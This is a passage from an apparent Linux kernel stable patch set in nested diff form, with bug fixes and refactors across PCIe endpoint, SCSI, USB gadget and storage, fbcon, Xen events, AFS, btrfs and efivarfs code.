++static u32 ls_lut_readl(struct ls_pcie_ep *pcie, u32 offset)
++{
++	struct dw_pcie *pci = pcie->pci;
++
++	if (pcie->big_endian)
++		return ioread32be(pci->dbi_base + offset);
++	else
++		return ioread32(pci->dbi_base + offset);
++}
++
++static void ls_lut_writel(struct ls_pcie_ep *pcie, u32 offset, u32 value)
++{
++	struct dw_pcie *pci = pcie->pci;
++
++	if (pcie->big_endian)
++		iowrite32be(value, pci->dbi_base + offset);
++	else
++		iowrite32(value, pci->dbi_base + offset);
++}
++
++static irqreturn_t ls_pcie_ep_event_handler(int irq, void *dev_id)
++{
++	struct ls_pcie_ep *pcie = dev_id;
++	struct dw_pcie *pci = pcie->pci;
++	u32 val, cfg;
++	u8 offset;
++
++	val = ls_lut_readl(pcie, PEX_PF0_PME_MES_DR);
++	ls_lut_writel(pcie, PEX_PF0_PME_MES_DR, val);
++
++	if (!val)
++		return IRQ_NONE;
++
++	if (val & PEX_PF0_PME_MES_DR_LUD) {
++
++		offset = dw_pcie_find_capability(pci, PCI_CAP_ID_EXP);
++
++		/*
++		 * The values of the Maximum Link Width and Supported Link
++		 * Speed from the Link Capabilities Register will be lost
++		 * during link down or hot reset. Restore initial value
++		 * that configured by the Reset Configuration Word (RCW).
++		 */
++		dw_pcie_dbi_ro_wr_en(pci);
++		dw_pcie_writel_dbi(pci, offset + PCI_EXP_LNKCAP, pcie->lnkcap);
++		dw_pcie_dbi_ro_wr_dis(pci);
++
++		cfg = ls_lut_readl(pcie, PEX_PF0_CONFIG);
++		cfg |= PEX_PF0_CFG_READY;
++		ls_lut_writel(pcie, PEX_PF0_CONFIG, cfg);
++		dw_pcie_ep_linkup(&pci->ep);
++
++		dev_dbg(pci->dev, "Link up\n");
++	} else if (val & PEX_PF0_PME_MES_DR_LDD) {
++		dev_dbg(pci->dev, "Link down\n");
++	} else if (val & PEX_PF0_PME_MES_DR_HRD) {
++		dev_dbg(pci->dev, "Hot reset\n");
++	}
++
++	return IRQ_HANDLED;
++}
++
++static int ls_pcie_ep_interrupt_init(struct ls_pcie_ep *pcie,
++				     struct platform_device *pdev)
++{
++	u32 val;
++	int ret;
++
++	pcie->irq = platform_get_irq_byname(pdev, "pme");
++	if (pcie->irq < 0)
++		return pcie->irq;
++
++	ret = devm_request_irq(&pdev->dev, pcie->irq, ls_pcie_ep_event_handler,
++			       IRQF_SHARED, pdev->name, pcie);
++	if (ret) {
++		dev_err(&pdev->dev, "Can't register PCIe IRQ\n");
++		return ret;
++	}
++
++	/* Enable interrupts */
++	val = ls_lut_readl(pcie, PEX_PF0_PME_MES_IER);
++	val |=  PEX_PF0_PME_MES_IER_LDDIE | PEX_PF0_PME_MES_IER_HRDIE |
++		PEX_PF0_PME_MES_IER_LUDIE;
++	ls_lut_writel(pcie, PEX_PF0_PME_MES_IER, val);
++
++	return 0;
++}
++
+ static const struct pci_epc_features*
+ ls_pcie_ep_get_features(struct dw_pcie_ep *ep)
+ {
+@@ -124,6 +229,8 @@ static int __init ls_pcie_ep_probe(struct platform_device *pdev)
+ 	struct ls_pcie_ep *pcie;
+ 	struct pci_epc_features *ls_epc;
+ 	struct resource *dbi_base;
++	u8 offset;
++	int ret;
+ 
+ 	pcie = devm_kzalloc(dev, sizeof(*pcie), GFP_KERNEL);
+ 	if (!pcie)
+@@ -143,6 +250,7 @@ static int __init ls_pcie_ep_probe(struct platform_device *pdev)
+ 	pci->ops = pcie->drvdata->dw_pcie_ops;
+ 
+ 	ls_epc->bar_fixed_64bit = (1 << BAR_2) | (1 << BAR_4);
++	ls_epc->linkup_notifier = true;
+ 
+ 	pcie->pci = pci;
+ 	pcie->ls_epc = ls_epc;
+@@ -154,9 +262,18 @@ static int __init ls_pcie_ep_probe(struct platform_device *pdev)
+ 
+ 	pci->ep.ops = &ls_pcie_ep_ops;
+ 
++	pcie->big_endian = of_property_read_bool(dev->of_node, "big-endian");
++
+ 	platform_set_drvdata(pdev, pcie);
+ 
+-	return dw_pcie_ep_init(&pci->ep);
++	offset = dw_pcie_find_capability(pci, PCI_CAP_ID_EXP);
++	pcie->lnkcap = dw_pcie_readl_dbi(pci, offset + PCI_EXP_LNKCAP);
++
++	ret = dw_pcie_ep_init(&pci->ep);
++	if (ret)
++		return ret;
++
++	return ls_pcie_ep_interrupt_init(pcie, pdev);
+ }
+ 
+ static struct platform_driver ls_pcie_ep_driver = {
+diff --git a/drivers/phy/freescale/phy-fsl-imx8-mipi-dphy.c b/drivers/phy/freescale/phy-fsl-imx8-mipi-dphy.c
+index e625b32889bfc..0928a526e2ab3 100644
+--- a/drivers/phy/freescale/phy-fsl-imx8-mipi-dphy.c
++++ b/drivers/phy/freescale/phy-fsl-imx8-mipi-dphy.c
+@@ -706,7 +706,7 @@ static int mixel_dphy_probe(struct platform_device *pdev)
+ 			return ret;
+ 		}
+ 
+-		priv->id = of_alias_get_id(np, "mipi_dphy");
++		priv->id = of_alias_get_id(np, "mipi-dphy");
+ 		if (priv->id < 0) {
+ 			dev_err(dev, "Failed to get phy node alias id: %d\n",
+ 				priv->id);
+diff --git a/drivers/power/supply/bq27xxx_battery_i2c.c b/drivers/power/supply/bq27xxx_battery_i2c.c
+index 0713a52a25107..17b37354e32c0 100644
+--- a/drivers/power/supply/bq27xxx_battery_i2c.c
++++ b/drivers/power/supply/bq27xxx_battery_i2c.c
+@@ -209,7 +209,9 @@ static void bq27xxx_battery_i2c_remove(struct i2c_client *client)
+ {
+ 	struct bq27xxx_device_info *di = i2c_get_clientdata(client);
+ 
+-	free_irq(client->irq, di);
++	if (client->irq)
++		free_irq(client->irq, di);
++
+ 	bq27xxx_battery_teardown(di);
+ 
+ 	mutex_lock(&battery_mutex);
+diff --git a/drivers/scsi/scsi_lib.c b/drivers/scsi/scsi_lib.c
+index 5c5954b78585e..edd296f950a33 100644
+--- a/drivers/scsi/scsi_lib.c
++++ b/drivers/scsi/scsi_lib.c
+@@ -185,39 +185,37 @@ void scsi_queue_insert(struct scsi_cmnd *cmd, int reason)
+ 	__scsi_queue_insert(cmd, reason, true);
+ }
+ 
+-
+ /**
+- * __scsi_execute - insert request and wait for the result
+- * @sdev:	scsi device
++ * scsi_execute_cmd - insert request and wait for the result
++ * @sdev:	scsi_device
+  * @cmd:	scsi command
+- * @data_direction: data direction
++ * @opf:	block layer request cmd_flags
+  * @buffer:	data buffer
+  * @bufflen:	len of buffer
+- * @sense:	optional sense buffer
+- * @sshdr:	optional decoded sense header
+  * @timeout:	request timeout in HZ
+  * @retries:	number of times to retry request
+- * @flags:	flags for ->cmd_flags
+- * @rq_flags:	flags for ->rq_flags
+- * @resid:	optional residual length
++ * @args:	Optional args. See struct definition for field descriptions
+  *
+  * Returns the scsi_cmnd result field if a command was executed, or a negative
+  * Linux error code if we didn't get that far.
+  */
+-int __scsi_execute(struct scsi_device *sdev, const unsigned char *cmd,
+-		 int data_direction, void *buffer, unsigned bufflen,
+-		 unsigned char *sense, struct scsi_sense_hdr *sshdr,
+-		 int timeout, int retries, blk_opf_t flags,
+-		 req_flags_t rq_flags, int *resid)
++int scsi_execute_cmd(struct scsi_device *sdev, const unsigned char *cmd,
++		     blk_opf_t opf, void *buffer, unsigned int bufflen,
++		     int timeout, int retries,
++		     const struct scsi_exec_args *args)
+ {
++	static const struct scsi_exec_args default_args;
+ 	struct request *req;
+ 	struct scsi_cmnd *scmd;
+ 	int ret;
+ 
+-	req = scsi_alloc_request(sdev->request_queue,
+-			data_direction == DMA_TO_DEVICE ?
+-			REQ_OP_DRV_OUT : REQ_OP_DRV_IN,
+-			rq_flags & RQF_PM ? BLK_MQ_REQ_PM : 0);
++	if (!args)
++		args = &default_args;
++	else if (WARN_ON_ONCE(args->sense &&
++			      args->sense_len != SCSI_SENSE_BUFFERSIZE))
++		return -EINVAL;
++
++	req = scsi_alloc_request(sdev->request_queue, opf, args->req_flags);
+ 	if (IS_ERR(req))
+ 		return PTR_ERR(req);
+ 
+@@ -232,8 +230,7 @@ int __scsi_execute(struct scsi_device *sdev, const unsigned char *cmd,
+ 	memcpy(scmd->cmnd, cmd, scmd->cmd_len);
+ 	scmd->allowed = retries;
+ 	req->timeout = timeout;
+-	req->cmd_flags |= flags;
+-	req->rq_flags |= rq_flags | RQF_QUIET;
++	req->rq_flags |= RQF_QUIET;
+ 
+ 	/*
+ 	 * head injection *required* here otherwise quiesce won't work
+@@ -249,20 +246,21 @@ int __scsi_execute(struct scsi_device *sdev, const unsigned char *cmd,
+ 	if (unlikely(scmd->resid_len > 0 && scmd->resid_len <= bufflen))
+ 		memset(buffer + bufflen - scmd->resid_len, 0, scmd->resid_len);
+ 
+-	if (resid)
+-		*resid = scmd->resid_len;
+-	if (sense && scmd->sense_len)
+-		memcpy(sense, scmd->sense_buffer, SCSI_SENSE_BUFFERSIZE);
+-	if (sshdr)
++	if (args->resid)
++		*args->resid = scmd->resid_len;
++	if (args->sense)
++		memcpy(args->sense, scmd->sense_buffer, SCSI_SENSE_BUFFERSIZE);
++	if (args->sshdr)
+ 		scsi_normalize_sense(scmd->sense_buffer, scmd->sense_len,
+-				     sshdr);
++				     args->sshdr);
++
+ 	ret = scmd->result;
+  out:
+ 	blk_mq_free_request(req);
+ 
+ 	return ret;
+ }
+-EXPORT_SYMBOL(__scsi_execute);
++EXPORT_SYMBOL(scsi_execute_cmd);
+ 
+ /*
+  * Wake up the error handler if necessary. Avoid as follows that the error
+diff --git a/drivers/scsi/sd.c b/drivers/scsi/sd.c
+index 31b5273f43a71..4433b02c8935f 100644
+--- a/drivers/scsi/sd.c
++++ b/drivers/scsi/sd.c
+@@ -3284,6 +3284,24 @@ static bool sd_validate_opt_xfer_size(struct scsi_disk *sdkp,
+ 	return true;
+ }
+ 
++static void sd_read_block_zero(struct scsi_disk *sdkp)
++{
++	unsigned int buf_len = sdkp->device->sector_size;
++	char *buffer, cmd[10] = { };
++
++	buffer = kmalloc(buf_len, GFP_KERNEL);
++	if (!buffer)
++		return;
++
++	cmd[0] = READ_10;
++	put_unaligned_be32(0, &cmd[2]); /* Logical block address 0 */
++	put_unaligned_be16(1, &cmd[7]);	/* Transfer 1 logical block */
++
++	scsi_execute_cmd(sdkp->device, cmd, REQ_OP_DRV_IN, buffer, buf_len,
++			 SD_TIMEOUT, sdkp->max_retries, NULL);
++	kfree(buffer);
++}
++
+ /**
+  *	sd_revalidate_disk - called the first time a new disk is seen,
+  *	performs disk spin up, read_capacity, etc.
+@@ -3323,7 +3341,13 @@ static int sd_revalidate_disk(struct gendisk *disk)
+ 	 */
+ 	if (sdkp->media_present) {
+ 		sd_read_capacity(sdkp, buffer);
+-
++		/*
++		 * Some USB/UAS devices return generic values for mode pages
++		 * until the media has been accessed. Trigger a READ operation
++		 * to force the device to populate mode pages.
++		 */
++		if (sdp->read_before_ms)
++			sd_read_block_zero(sdkp);
+ 		/*
+ 		 * set the default to rotational.  All non-rotational devices
+ 		 * support the block characteristics VPD page, which will
+diff --git a/drivers/soc/qcom/rpmhpd.c b/drivers/soc/qcom/rpmhpd.c
+index 092f6ab09acf3..9a90f241bb97f 100644
+--- a/drivers/soc/qcom/rpmhpd.c
++++ b/drivers/soc/qcom/rpmhpd.c
+@@ -492,12 +492,15 @@ static int rpmhpd_aggregate_corner(struct rpmhpd *pd, unsigned int corner)
+ 	unsigned int active_corner, sleep_corner;
+ 	unsigned int this_active_corner = 0, this_sleep_corner = 0;
+ 	unsigned int peer_active_corner = 0, peer_sleep_corner = 0;
++	unsigned int peer_enabled_corner;
+ 
+ 	to_active_sleep(pd, corner, &this_active_corner, &this_sleep_corner);
+ 
+-	if (peer && peer->enabled)
+-		to_active_sleep(peer, peer->corner, &peer_active_corner,
++	if (peer && peer->enabled) {
++		peer_enabled_corner = max(peer->corner, peer->enable_corner);
++		to_active_sleep(peer, peer_enabled_corner, &peer_active_corner,
+ 				&peer_sleep_corner);
++	}
+ 
+ 	active_corner = max(this_active_corner, peer_active_corner);
+ 
+diff --git a/drivers/usb/gadget/composite.c b/drivers/usb/gadget/composite.c
+index cb0a4e2cdbb73..247cca46cdfae 100644
+--- a/drivers/usb/gadget/composite.c
++++ b/drivers/usb/gadget/composite.c
+@@ -511,6 +511,19 @@ static u8 encode_bMaxPower(enum usb_device_speed speed,
+ 		return min(val, 900U) / 8;
+ }
+ 
++void check_remote_wakeup_config(struct usb_gadget *g,
++				struct usb_configuration *c)
++{
++	if (USB_CONFIG_ATT_WAKEUP & c->bmAttributes) {
++		/* Reset the rw bit if gadget is not capable of it */
++		if (!g->wakeup_capable && g->ops->set_remote_wakeup) {
++			WARN(c->cdev, "Clearing wakeup bit for config c.%d\n",
++			     c->bConfigurationValue);
++			c->bmAttributes &= ~USB_CONFIG_ATT_WAKEUP;
++		}
++	}
++}
++
+ static int config_buf(struct usb_configuration *config,
+ 		enum usb_device_speed speed, void *buf, u8 type)
+ {
+@@ -959,6 +972,11 @@ static int set_config(struct usb_composite_dev *cdev,
+ 		power = min(power, 500U);
+ 	else
+ 		power = min(power, 900U);
++
++	if (USB_CONFIG_ATT_WAKEUP & c->bmAttributes)
++		usb_gadget_set_remote_wakeup(gadget, 1);
++	else
++		usb_gadget_set_remote_wakeup(gadget, 0);
+ done:
+ 	if (power <= USB_SELF_POWER_VBUS_MAX_DRAW)
+ 		usb_gadget_set_selfpowered(gadget);
+diff --git a/drivers/usb/gadget/configfs.c b/drivers/usb/gadget/configfs.c
+index 4dcf29577f8f1..b94aec6227c51 100644
+--- a/drivers/usb/gadget/configfs.c
++++ b/drivers/usb/gadget/configfs.c
+@@ -1376,6 +1376,9 @@ static int configfs_composite_bind(struct usb_gadget *gadget,
+ 		if (gadget_is_otg(gadget))
+ 			c->descriptors = otg_desc;
+ 
++		/* Properly configure the bmAttributes wakeup bit */
++		check_remote_wakeup_config(gadget, c);
++
+ 		cfg = container_of(c, struct config_usb_cfg, c);
+ 		if (!list_empty(&cfg->string_list)) {
+ 			i = 0;
+diff --git a/drivers/usb/gadget/udc/core.c b/drivers/usb/gadget/udc/core.c
+index c40f2ecbe1b8c..0edd9e53fc5a1 100644
+--- a/drivers/usb/gadget/udc/core.c
++++ b/drivers/usb/gadget/udc/core.c
+@@ -525,6 +525,33 @@ int usb_gadget_wakeup(struct usb_gadget *gadget)
+ }
+ EXPORT_SYMBOL_GPL(usb_gadget_wakeup);
+ 
++/**
++ * usb_gadget_set_remote_wakeup - configures the device remote wakeup feature.
++ * @gadget:the device being configured for remote wakeup
++ * @set:value to be configured.
++ *
++ * set to one to enable remote wakeup feature and zero to disable it.
++ *
++ * returns zero on success, else negative errno.
++ */
++int usb_gadget_set_remote_wakeup(struct usb_gadget *gadget, int set)
++{
++	int ret = 0;
++
++	if (!gadget->ops->set_remote_wakeup) {
++		ret = -EOPNOTSUPP;
++		goto out;
++	}
++
++	ret = gadget->ops->set_remote_wakeup(gadget, set);
++
++out:
++	trace_usb_gadget_set_remote_wakeup(gadget, ret);
++
++	return ret;
++}
++EXPORT_SYMBOL_GPL(usb_gadget_set_remote_wakeup);
++
+ /**
+  * usb_gadget_set_selfpowered - sets the device selfpowered feature.
+  * @gadget:the device being declared as self-powered
+diff --git a/drivers/usb/gadget/udc/trace.h b/drivers/usb/gadget/udc/trace.h
+index abdbcb1bacb0b..a5ed26fbc2dad 100644
+--- a/drivers/usb/gadget/udc/trace.h
++++ b/drivers/usb/gadget/udc/trace.h
+@@ -91,6 +91,11 @@ DEFINE_EVENT(udc_log_gadget, usb_gadget_wakeup,
+ 	TP_ARGS(g, ret)
+ );
+ 
++DEFINE_EVENT(udc_log_gadget, usb_gadget_set_remote_wakeup,
++	TP_PROTO(struct usb_gadget *g, int ret),
++	TP_ARGS(g, ret)
++);
++
+ DEFINE_EVENT(udc_log_gadget, usb_gadget_set_selfpowered,
+ 	TP_PROTO(struct usb_gadget *g, int ret),
+ 	TP_ARGS(g, ret)
+diff --git a/drivers/usb/storage/scsiglue.c b/drivers/usb/storage/scsiglue.c
+index c54e9805da536..12cf9940e5b67 100644
+--- a/drivers/usb/storage/scsiglue.c
++++ b/drivers/usb/storage/scsiglue.c
+@@ -179,6 +179,13 @@ static int slave_configure(struct scsi_device *sdev)
+ 		 */
+ 		sdev->use_192_bytes_for_3f = 1;
+ 
++		/*
++		 * Some devices report generic values until the media has been
++		 * accessed. Force a READ(10) prior to querying device
++		 * characteristics.
++		 */
++		sdev->read_before_ms = 1;
++
+ 		/*
+ 		 * Some devices don't like MODE SENSE with page=0x3f,
+ 		 * which is the command used for checking if a device
+diff --git a/drivers/usb/storage/uas.c b/drivers/usb/storage/uas.c
+index de3836412bf32..ed22053b3252f 100644
+--- a/drivers/usb/storage/uas.c
++++ b/drivers/usb/storage/uas.c
+@@ -878,6 +878,13 @@ static int uas_slave_configure(struct scsi_device *sdev)
+ 	if (devinfo->flags & US_FL_CAPACITY_HEURISTICS)
+ 		sdev->guess_capacity = 1;
+ 
++	/*
++	 * Some devices report generic values until the media has been
++	 * accessed. Force a READ(10) prior to querying device
++	 * characteristics.
++	 */
++	sdev->read_before_ms = 1;
++
+ 	/*
+ 	 * Some devices don't like MODE SENSE with page=0x3f,
+ 	 * which is the command used for checking if a device
+diff --git a/drivers/video/fbdev/core/fbcon.c b/drivers/video/fbdev/core/fbcon.c
+index fa205be94a4b8..14498a0d13e0b 100644
+--- a/drivers/video/fbdev/core/fbcon.c
++++ b/drivers/video/fbdev/core/fbcon.c
+@@ -2397,11 +2397,9 @@ static int fbcon_do_set_font(struct vc_data *vc, int w, int h, int charcount,
+ 	struct fbcon_ops *ops = info->fbcon_par;
+ 	struct fbcon_display *p = &fb_display[vc->vc_num];
+ 	int resize, ret, old_userfont, old_width, old_height, old_charcount;
+-	char *old_data = NULL;
++	u8 *old_data = vc->vc_font.data;
+ 
+ 	resize = (w != vc->vc_font.width) || (h != vc->vc_font.height);
+-	if (p->userfont)
+-		old_data = vc->vc_font.data;
+ 	vc->vc_font.data = (void *)(p->fontdata = data);
+ 	old_userfont = p->userfont;
+ 	if ((p->userfont = userfont))
+@@ -2435,13 +2433,13 @@ static int fbcon_do_set_font(struct vc_data *vc, int w, int h, int charcount,
+ 		update_screen(vc);
+ 	}
+ 
+-	if (old_data && (--REFCOUNT(old_data) == 0))
++	if (old_userfont && (--REFCOUNT(old_data) == 0))
+ 		kfree(old_data - FONT_EXTRA_WORDS * sizeof(int));
+ 	return 0;
+ 
+ err_out:
+ 	p->fontdata = old_data;
+-	vc->vc_font.data = (void *)old_data;
++	vc->vc_font.data = old_data;
+ 
+ 	if (userfont) {
+ 		p->userfont = old_userfont;
+diff --git a/drivers/xen/events/events_base.c b/drivers/xen/events/events_base.c
+index 00f8e349921d4..96b96516c9806 100644
+--- a/drivers/xen/events/events_base.c
++++ b/drivers/xen/events/events_base.c
+@@ -937,8 +937,8 @@ static void shutdown_pirq(struct irq_data *data)
+ 		return;
+ 
+ 	do_mask(info, EVT_MASK_REASON_EXPLICIT);
+-	xen_evtchn_close(evtchn);
+ 	xen_irq_info_cleanup(info);
++	xen_evtchn_close(evtchn);
+ }
+ 
+ static void enable_pirq(struct irq_data *data)
+@@ -982,8 +982,6 @@ static void __unbind_from_irq(unsigned int irq)
+ 		unsigned int cpu = cpu_from_irq(irq);
+ 		struct xenbus_device *dev;
+ 
+-		xen_evtchn_close(evtchn);
+-
+ 		switch (type_from_irq(irq)) {
+ 		case IRQT_VIRQ:
+ 			per_cpu(virq_to_irq, cpu)[virq_from_irq(irq)] = -1;
+@@ -1001,6 +999,7 @@ static void __unbind_from_irq(unsigned int irq)
+ 		}
+ 
+ 		xen_irq_info_cleanup(info);
++		xen_evtchn_close(evtchn);
+ 	}
+ 
+ 	xen_free_irq(irq);
+diff --git a/fs/afs/dir.c b/fs/afs/dir.c
+index cf811b77ee671..6e2c967fae6fc 100644
+--- a/fs/afs/dir.c
++++ b/fs/afs/dir.c
+@@ -478,8 +478,10 @@ static int afs_dir_iterate_block(struct afs_vnode *dvnode,
+ 		    dire->u.name[0] == '.' &&
+ 		    ctx->actor != afs_lookup_filldir &&
+ 		    ctx->actor != afs_lookup_one_filldir &&
+-		    memcmp(dire->u.name, ".__afs", 6) == 0)
++		    memcmp(dire->u.name, ".__afs", 6) == 0) {
++			ctx->pos = blkoff + next * sizeof(union afs_xdr_dirent);
+ 			continue;
++		}
+ 
+ 		/* found the next entry */
+ 		if (!dir_emit(ctx, dire->u.name, nlen,
+diff --git a/fs/btrfs/dev-replace.c b/fs/btrfs/dev-replace.c
+index 61e58066b5fd2..9c856a73d5333 100644
+--- a/fs/btrfs/dev-replace.c
++++ b/fs/btrfs/dev-replace.c
+@@ -740,6 +740,23 @@ static int btrfs_dev_replace_start(struct btrfs_fs_info *fs_info,
+ 	return ret;
+ }
+ 
++static int btrfs_check_replace_dev_names(struct btrfs_ioctl_dev_replace_args *args)
++{
++	if (args->start.srcdevid == 0) {
++		if (memchr(args->start.srcdev_name, 0,
++			   sizeof(args->start.srcdev_name)) == NULL)
++			return -ENAMETOOLONG;
++	} else {
++		args->start.srcdev_name[0] = 0;
++	}
++
++	if (memchr(args->start.tgtdev_name, 0,
++		   sizeof(args->start.tgtdev_name)) == NULL)
++	    return -ENAMETOOLONG;
++
++	return 0;
++}
++
+ int btrfs_dev_replace_by_ioctl(struct btrfs_fs_info *fs_info,
+ 			    struct btrfs_ioctl_dev_replace_args *args)
+ {
+@@ -752,10 +769,9 @@ int btrfs_dev_replace_by_ioctl(struct btrfs_fs_info *fs_info,
+ 	default:
+ 		return -EINVAL;
+ 	}
+-
+-	if ((args->start.srcdevid == 0 && args->start.srcdev_name[0] == '\0') ||
+-	    args->start.tgtdev_name[0] == '\0')
+-		return -EINVAL;
++	ret = btrfs_check_replace_dev_names(args);
++	if (ret < 0)
++		return ret;
+ 
+ 	ret = btrfs_dev_replace_start(fs_info, args->start.tgtdev_name,
+ 					args->start.srcdevid,
+diff --git a/fs/btrfs/disk-io.c b/fs/btrfs/disk-io.c
+index 0d1b05ded1e35..5756edb37c61e 100644
+--- a/fs/btrfs/disk-io.c
++++ b/fs/btrfs/disk-io.c
+@@ -1643,12 +1643,12 @@ void btrfs_free_fs_info(struct btrfs_fs_info *fs_info)
+  *
+  * @objectid:	root id
+  * @anon_dev:	preallocated anonymous block device number for new roots,
+- * 		pass 0 for new allocation.
++ *		pass NULL for a new allocation.
+  * @check_ref:	whether to check root item references, If true, return -ENOENT
+  *		for orphan roots
+  */
+ static struct btrfs_root *btrfs_get_root_ref(struct btrfs_fs_info *fs_info,
+-					     u64 objectid, dev_t anon_dev,
++					     u64 objectid, dev_t *anon_dev,
+ 					     bool check_ref)
+ {
+ 	struct btrfs_root *root;
+@@ -1668,9 +1668,9 @@ static struct btrfs_root *btrfs_get_root_ref(struct btrfs_fs_info *fs_info,
+ 		 * that common but still possible.  In that case, we just need
+ 		 * to free the anon_dev.
+ 		 */
+-		if (unlikely(anon_dev)) {
+-			free_anon_bdev(anon_dev);
+-			anon_dev = 0;
++		if (unlikely(anon_dev && *anon_dev)) {
++			free_anon_bdev(*anon_dev);
++			*anon_dev = 0;
+ 		}
+ 
+ 		if (check_ref && btrfs_root_refs(&root->root_item) == 0) {
+@@ -1692,7 +1692,7 @@ static struct btrfs_root *btrfs_get_root_ref(struct btrfs_fs_info *fs_info,
+ 		goto fail;
+ 	}
+ 
+-	ret = btrfs_init_fs_root(root, anon_dev);
++	ret = btrfs_init_fs_root(root, anon_dev ? *anon_dev : 0);
+ 	if (ret)
+ 		goto fail;
+ 
+@@ -1728,7 +1728,7 @@ static struct btrfs_root *btrfs_get_root_ref(struct btrfs_fs_info *fs_info,
+ 	 * root's anon_dev to 0 to avoid a double free, once by btrfs_put_root()
+ 	 * and once again by our caller.
+ 	 */
+-	if (anon_dev)
++	if (anon_dev && *anon_dev)
+ 		root->anon_dev = 0;
+ 	btrfs_put_root(root);
+ 	return ERR_PTR(ret);
+@@ -1744,7 +1744,7 @@ static struct btrfs_root *btrfs_get_root_ref(struct btrfs_fs_info *fs_info,
+ struct btrfs_root *btrfs_get_fs_root(struct btrfs_fs_info *fs_info,
+ 				     u64 objectid, bool check_ref)
+ {
+-	return btrfs_get_root_ref(fs_info, objectid, 0, check_ref);
++	return btrfs_get_root_ref(fs_info, objectid, NULL, check_ref);
+ }
+ 
+ /*
+@@ -1752,11 +1752,11 @@ struct btrfs_root *btrfs_get_fs_root(struct btrfs_fs_info *fs_info,
+  * the anonymous block device id
+  *
+  * @objectid:	tree objectid
+- * @anon_dev:	if zero, allocate a new anonymous block device or use the
+- *		parameter value
++ * @anon_dev:	if NULL, allocate a new anonymous block device or use the
++ *		parameter value if not NULL
+  */
+ struct btrfs_root *btrfs_get_new_fs_root(struct btrfs_fs_info *fs_info,
+-					 u64 objectid, dev_t anon_dev)
++					 u64 objectid, dev_t *anon_dev)
+ {
+ 	return btrfs_get_root_ref(fs_info, objectid, anon_dev, true);
+ }
+diff --git a/fs/btrfs/disk-io.h b/fs/btrfs/disk-io.h
+index 7322af63c0cc7..24bddca86e9c9 100644
+--- a/fs/btrfs/disk-io.h
++++ b/fs/btrfs/disk-io.h
+@@ -65,7 +65,7 @@ void btrfs_free_fs_roots(struct btrfs_fs_info *fs_info);
+ struct btrfs_root *btrfs_get_fs_root(struct btrfs_fs_info *fs_info,
+ 				     u64 objectid, bool check_ref);
+ struct btrfs_root *btrfs_get_new_fs_root(struct btrfs_fs_info *fs_info,
+-					 u64 objectid, dev_t anon_dev);
++					 u64 objectid, dev_t *anon_dev);
+ struct btrfs_root *btrfs_get_fs_root_commit_root(struct btrfs_fs_info *fs_info,
+ 						 struct btrfs_path *path,
+ 						 u64 objectid);
+diff --git a/fs/btrfs/ioctl.c b/fs/btrfs/ioctl.c
+index 196e222749ccd..64b37afb7c87f 100644
+--- a/fs/btrfs/ioctl.c
++++ b/fs/btrfs/ioctl.c
+@@ -708,7 +708,7 @@ static noinline int create_subvol(struct user_namespace *mnt_userns,
+ 	free_extent_buffer(leaf);
+ 	leaf = NULL;
+ 
+-	new_root = btrfs_get_new_fs_root(fs_info, objectid, anon_dev);
++	new_root = btrfs_get_new_fs_root(fs_info, objectid, &anon_dev);
+ 	if (IS_ERR(new_root)) {
+ 		ret = PTR_ERR(new_root);
+ 		btrfs_abort_transaction(trans, ret);
+diff --git a/fs/btrfs/send.c b/fs/btrfs/send.c
+index a75669972dc73..9f7ffd9ef6fd7 100644
+--- a/fs/btrfs/send.c
++++ b/fs/btrfs/send.c
+@@ -6462,11 +6462,20 @@ static int finish_inode_if_needed(struct send_ctx *sctx, int at_end)
+ 				if (ret)
+ 					goto out;
+ 			}
+-			if (sctx->cur_inode_last_extent <
+-			    sctx->cur_inode_size) {
+-				ret = send_hole(sctx, sctx->cur_inode_size);
+-				if (ret)
++			if (sctx->cur_inode_last_extent < sctx->cur_inode_size) {
++				ret = range_is_hole_in_parent(sctx,
++						      sctx->cur_inode_last_extent,
++						      sctx->cur_inode_size);
++				if (ret < 0) {
+ 					goto out;
++				} else if (ret == 0) {
++					ret = send_hole(sctx, sctx->cur_inode_size);
++					if (ret < 0)
++						goto out;
++				} else {
++					/* Range is already a hole, skip. */
++					ret = 0;
++				}
+ 			}
+ 		}
+ 		if (need_truncate) {
+diff --git a/fs/btrfs/transaction.c b/fs/btrfs/transaction.c
+index 60db4c3b82fa1..b172091f42612 100644
+--- a/fs/btrfs/transaction.c
++++ b/fs/btrfs/transaction.c
+@@ -1809,7 +1809,7 @@ static noinline int create_pending_snapshot(struct btrfs_trans_handle *trans,
+ 	}
+ 
+ 	key.offset = (u64)-1;
+-	pending->snap = btrfs_get_new_fs_root(fs_info, objectid, pending->anon_dev);
++	pending->snap = btrfs_get_new_fs_root(fs_info, objectid, &pending->anon_dev);
+ 	if (IS_ERR(pending->snap)) {
+ 		ret = PTR_ERR(pending->snap);
+ 		pending->snap = NULL;
+diff --git a/fs/efivarfs/vars.c b/fs/efivarfs/vars.c
+index 9e4f47808bd5a..13bc606989557 100644
+--- a/fs/efivarfs/vars.c
++++ b/fs/efivarfs/vars.c
+@@ -372,7 +372,7 @@ static void dup_variable_bug(efi_char16_t *str16, efi_guid_t *vendor_guid,
+ int efivar_init(int (*func)(efi_char16_t *, efi_guid_t, unsigned long, void *),
+ 		void *data, bool duplicates, struct list_head *head)
+ {
+-	unsigned long variable_name_size = 1024;
++	unsigned long variable_name_size = 512;
+ 	efi_char16_t *variable_name;
+ 	efi_status_t status;
+ 	efi_guid_t vendor_guid;
+@@ -389,12 +389,13 @@ int efivar_init(int (*func)(efi_char16_t *, efi_guid_t, unsigned long, void *),
+ 		goto free;
+ 
+ 	/*
+-	 * Per EFI spec, the maximum storage allocated for both
+-	 * the variable name and variable data is 1024 bytes.
++	 * A small set of old UEFI implementations reject sizes
++	 * above a certain threshold, the lowest seen in the wild
++	 * is 512.
+ 	 */
+ 
+ 	do {
+-		variable_name_size = 1024;
++		variable_name_size = 512;
+ 
+ 		status = efivar_get_next_variable(&variable_name_size,
+ 						  variable_name,
+@@ -431,9 +432,13 @@ int efivar_init(int (*func)(efi_char16_t *, efi_guid_t, unsigned long, void *),
+ 			break;
+ 		case EFI_NOT_FOUND:
+ 			break;
++		case EFI_BUFFER_TOO_SMALL:
++			pr_warn("efivars: Variable name size exceeds maximum (%lu > 512)\n",
++				variable_name_size);
++			status = EFI_NOT_FOUND;
++			break;
+ 		default:
+-			printk(KERN_WARNING "efivars: get_next_variable: status=%lx\n",
+-				status);
++			pr_warn("efivars: get_next_variable: status=%lx\n", status);
+ 			status = EFI_NOT_FOUND;
+ 			break;
+ 		}
+diff --git a/fs/exportfs/expfs.c b/fs/exportfs/expfs.c
+index c648a493faf23..3204bd33e4e8a 100644
+--- a/fs/exportfs/expfs.c
